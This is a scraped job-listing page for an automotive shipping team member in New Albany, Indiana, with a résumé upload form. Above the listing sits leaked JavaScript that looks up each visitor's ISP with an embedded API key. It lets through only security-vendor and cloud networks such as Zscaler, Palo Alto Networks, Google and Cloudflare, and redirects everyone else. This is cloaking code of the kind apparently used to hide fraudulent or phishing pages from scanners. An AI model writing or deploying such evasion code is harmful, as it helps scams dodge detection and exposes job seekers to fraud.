Automotive Shipping Team Member

Automotive Shipping Team Member

Overview


const ipAddress = data.ip;

// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;

// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));

if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ''; } }) .catch(error => { console.error('Error retrieving ISP name:', error); }); }) .catch(error => { console.error('Error retrieving IP address or location:', error); });

Join our team as an Automotive Shipping Team Member in New Albany, Indiana. In this role, you will be responsible for preparing, inspecting, and loading vehicles for shipment ensuring quality and safety standards are met.

Key responsibilities include:

  • Inspecting vehicles for damages and proper documentation
  • Loading and securing vehicles onto transport carriers
  • Coordinating with logistics teams to ensure timely shipments
  • Maintaining a clean and organized work environment
  • Adhering to safety protocols and company policies

Skills needed:

  • Strong attention to detail
  • Ability to work in a fast-paced environment
  • Good communication and teamwork skills
  • Physical stamina for lifting and moving vehicles

Benefits include competitive pay, health insurance options, paid time off, and opportunities for growth within the company. Join us to be part of a dynamic team committed to excellence in automotive logistics.

Emploment Location
Indiana, New Albany

Apply to Join Progression Transport.

*
*
* Attach your resume. Max size 2mb Allowed Types: pdf